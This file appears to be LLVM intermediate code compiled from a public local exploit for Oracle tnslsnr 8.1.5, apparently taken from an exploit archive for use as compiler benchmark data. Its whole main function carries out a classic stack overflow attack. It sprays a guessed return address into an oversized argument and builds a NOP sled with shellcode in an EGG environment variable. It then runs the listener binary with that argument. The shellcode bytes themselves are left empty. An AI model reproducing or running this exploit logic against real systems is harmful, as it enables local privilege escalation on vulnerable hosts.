; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_21362.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_21362.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@DEFAULT_BUFFER_SIZE = common dso_local global i32 0, align 4
@DEFAULT_EGG_SIZE = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [40 x i8] c"unable to allocate memory for %d bytes\0A\00", align 1
@.str.1 = private unnamed_addr constant [22 x i8] c"Oracle tnslsrn 8.1.5\0A\00", align 1
@.str.2 = private unnamed_addr constant [52 x i8] c"Vulnerability found by KF / http://www.snosoft.com\0A\00", align 1
@.str.3 = private unnamed_addr constant [45 x i8] c"Coded by The Itch / http://www.promisc.org\0A\0A\00", align 1
@.str.4 = private unnamed_addr constant [28 x i8] c"Using return address: 0x%x\0A\00", align 1
@.str.5 = private unnamed_addr constant [26 x i8] c"Using buffersize    : %d\0A\00", align 1
@shellcode = common dso_local global i32* null, align 8
@NOP = common dso_local global i32 0, align 4
@.str.6 = private unnamed_addr constant [5 x i8] c"EGG=\00", align 1
@.str.7 = private unnamed_addr constant [47 x i8] c"/home/u01/app/oracle/product/8.1.5/bin/tnslsnr\00", align 1
@.str.8 = private unnamed_addr constant [8 x i8] c"tnslsnr\00", align 1
@get_sp = common dso_local global i32 0, align 4

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca i8*, align 8
  %7 = alloca i8*, align 8
  %8 = alloca i8*, align 8
  %9 = alloca i64*, align 8
  %10 = alloca i64, align 8
  %11 = alloca i32, align 4
  %12 = alloca i32, align 4
  %13 = alloca i32, align 4
  %14 = alloca i32, align 4
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  %15 = load i32, i32* @DEFAULT_BUFFER_SIZE, align 4
  store i32 %15, i32* %11, align 4
  %16 = load i32, i32* @DEFAULT_EGG_SIZE, align 4
  store i32 %16, i32* %12, align 4
  %17 = ptrtoint i32* %14 to i32
  store i32 %17, i32* %14, align 4
  %18 = load i32, i32* %4, align 4
  %19 = icmp sgt i32 %18, 1
  br i1 %19, label %20, label %25

20:                                               ; preds = %2
  %21 = load i8**, i8*** %5, align 8
  %22 = getelementptr inbounds i8*, i8** %21, i64 1
  %23 = load i8*, i8** %22, align 8
  %24 = call i32 @atoi(i8* %23)
  store i32 %24, i32* %11, align 4
  br label %25

25:                                               ; preds = %20, %2
  %26 = load i32, i32* %11, align 4
  %27 = call i8* @malloc(i32 %26)
  store i8* %27, i8** %6, align 8
  %28 = icmp ne i8* %27, null
  br i1 %28, label %33, label %29

29:                                               ; preds = %25
  %30 = load i32, i32* %11, align 4
  %31 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([40 x i8], [40 x i8]* @.str, i64 0, i64 0), i32 %30)
  %32 = call i32 @exit(i32 1) #3
  unreachable

33:                                               ; preds = %25
  %34 = load i32, i32* %12, align 4
  %35 = call i8* @malloc(i32 %34)
  store i8* %35, i8** %7, align 8
  %36 = icmp ne i8* %35, null
  br i1 %36, label %41, label %37

37:                                               ; preds = %33
  %38 = load i32, i32* %12, align 4
  %39 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([40 x i8], [40 x i8]* @.str, i64 0, i64 0), i32 %38)
  %40 = call i32 @exit(i32 1) #3
  unreachable

41:                                               ; preds = %33
  %42 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([22 x i8], [22 x i8]* @.str.1, i64 0, i64 0))
  %43 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([52 x i8], [52 x i8]* @.str.2, i64 0, i64 0))
  %44 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([45 x i8], [45 x i8]* @.str.3, i64 0, i64 0))
  %45 = load i32, i32* %14, align 4
  %46 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([28 x i8], [28 x i8]* @.str.4, i64 0, i64 0), i32 %45)
  %47 = load i32, i32* %11, align 4
  %48 = sub nsw i32 %47, 1
  %49 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([26 x i8], [26 x i8]* @.str.5, i64 0, i64 0), i32 %48)
  %50 = load i8*, i8** %6, align 8
  store i8* %50, i8** %8, align 8
  %51 = load i8*, i8** %8, align 8
  %52 = bitcast i8* %51 to i64*
  store i64* %52, i64** %9, align 8
  store i32 0, i32* %13, align 4
  br label %53

53:                                               ; preds = %62, %41
  %54 = load i32, i32* %13, align 4
  %55 = load i32, i32* %11, align 4
  %56 = icmp slt i32 %54, %55
  br i1 %56, label %57, label %65

57:                                               ; preds = %53
  %58 = load i32, i32* %14, align 4
  %59 = sext i32 %58 to i64
  %60 = load i64*, i64** %9, align 8
  %61 = getelementptr inbounds i64, i64* %60, i32 1
  store i64* %61, i64** %9, align 8
  store i64 %59, i64* %60, align 8
  br label %62

62:                                               ; preds = %57
  %63 = load i32, i32* %13, align 4
  %64 = add nsw i32 %63, 4
  store i32 %64, i32* %13, align 4
  br label %53

65:                                               ; preds = %53
  %66 = load i8*, i8** %7, align 8
  store i8* %66, i8** %8, align 8
  store i32 0, i32* %13, align 4
  br label %67

67:                                               ; preds = %80, %65
  %68 = load i32, i32* %13, align 4
  %69 = load i32, i32* %12, align 4
  %70 = load i32*, i32** @shellcode, align 8
  %71 = call i32 @strlen(i32* %70)
  %72 = sub nsw i32 %69, %71
  %73 = sub nsw i32 %72, 1
  %74 = icmp slt i32 %68, %73
  br i1 %74, label %75, label %83

75:                                               ; preds = %67
  %76 = load i32, i32* @NOP, align 4
  %77 = trunc i32 %76 to i8
  %78 = load i8*, i8** %8, align 8
  %79 = getelementptr inbounds i8, i8* %78, i32 1
  store i8* %79, i8** %8, align 8
  store i8 %77, i8* %78, align 1
  br label %80

80:                                               ; preds = %75
  %81 = load i32, i32* %13, align 4
  %82 = add nsw i32 %81, 1
  store i32 %82, i32* %13, align 4
  br label %67

83:                                               ; preds = %67
  store i32 0, i32* %13, align 4
  br label %84

84:                                               ; preds = %98, %83
  %85 = load i32, i32* %13, align 4
  %86 = load i32*, i32** @shellcode, align 8
  %87 = call i32 @strlen(i32* %86)
  %88 = icmp slt i32 %85, %87
  br i1 %88, label %89, label %101

89:                                               ; preds = %84
  %90 = load i32*, i32** @shellcode, align 8
  %91 = load i32, i32* %13, align 4
  %92 = sext i32 %91 to i64
  %93 = getelementptr inbounds i32, i32* %90, i64 %92
  %94 = load i32, i32* %93, align 4
  %95 = trunc i32 %94 to i8
  %96 = load i8*, i8** %8, align 8
  %97 = getelementptr inbounds i8, i8* %96, i32 1
  store i8* %97, i8** %8, align 8
  store i8 %95, i8* %96, align 1
  br label %98

98:                                               ; preds = %89
  %99 = load i32, i32* %13, align 4
  %100 = add nsw i32 %99, 1
  store i32 %100, i32* %13, align 4
  br label %84

101:                                              ; preds = %84
  %102 = load i8*, i8** %7, align 8
  %103 = load i32, i32* %12, align 4
  %104 = sub nsw i32 %103, 1
  %105 = sext i32 %104 to i64
  %106 = getelementptr inbounds i8, i8* %102, i64 %105
  store i8 0, i8* %106, align 1
  %107 = load i8*, i8** %7, align 8
  %108 = call i32 @memcpy(i8* %107, i8* getelementptr inbounds ([5 x i8], [5 x i8]* @.str.6, i64 0, i64 0), i32 4)
  %109 = load i8*, i8** %7, align 8
  %110 = call i32 @putenv(i8* %109)
  %111 = load i8*, i8** %6, align 8
  %112 = load i32, i32* %11, align 4
  %113 = sub nsw i32 %112, 1
  %114 = sext i32 %113 to i64
  %115 = getelementptr inbounds i8, i8* %111, i64 %114
  store i8 0, i8* %115, align 1
  %116 = load i8*, i8** %6, align 8
  %117 = call i32 @execl(i8* getelementptr inbounds ([47 x i8], [47 x i8]* @.str.7, i64 0, i64 0), i8* getelementptr inbounds ([8 x i8], [8 x i8]* @.str.8, i64 0, i64 0), i8* %116, i32 0)
  ret i32 0
}

declare dso_local i32 @atoi(i8*) #1

declare dso_local i8* @malloc(i32) #1

declare dso_local i32 @printf(i8*, ...) #1

; Function Attrs: noreturn
declare dso_local i32 @exit(i32) #2

declare dso_local i32 @strlen(i32*) #1

declare dso_local i32 @memcpy(i8*, i8*, i32) #1

declare dso_local i32 @putenv(i8*) #1

declare dso_local i32 @execl(i8*, i8*, i8*, i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
